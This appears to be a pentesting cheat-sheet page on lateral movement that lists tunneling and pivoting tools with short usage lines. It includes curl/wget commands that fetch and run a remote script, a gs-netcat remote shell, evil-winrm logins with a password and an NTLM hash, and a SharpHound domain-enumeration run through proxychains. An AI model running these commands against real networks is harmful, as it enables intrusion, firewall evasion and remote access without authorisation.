Lateral Movement
Neo-reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Tunna: Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
pivotnacci: Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server that communicates with HTTP agents
. The architecture looks like the following:

ngrok: Spend more time programming. One command for an instant, secure URL to your localhost server through any NAT or firewall.
gsocket: The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.
Use either one of these two commands to deploy:
bash -c "$(curl -fsSL gsocket.io/x)"
bash -c "$(wget -qO- gsocket.io/x)"

Use either one of these two commands to uninstall:
GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
Access the remote host from anywhere in the world:
$ gs-netcat -s ExampleSecretChagneMe -i

evil-winrm: This shell is the ultimate WinRM shell for hacking/pentesting.
ruby evil-winrm.rb -i 10.10.10.161 -u username -p passw0rd
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
ruby evil-winrm.rb -i 10.10.10.149 -u 'DOMAIN\USER' -p 'passw0rd
proxychains windows
.\proxychains_win32_x64.exe -f .\proxychains.conf C:\Users\IEUser\Downloads\SharpHound.exe --collectionmethods All
Last updated
Was this helpful?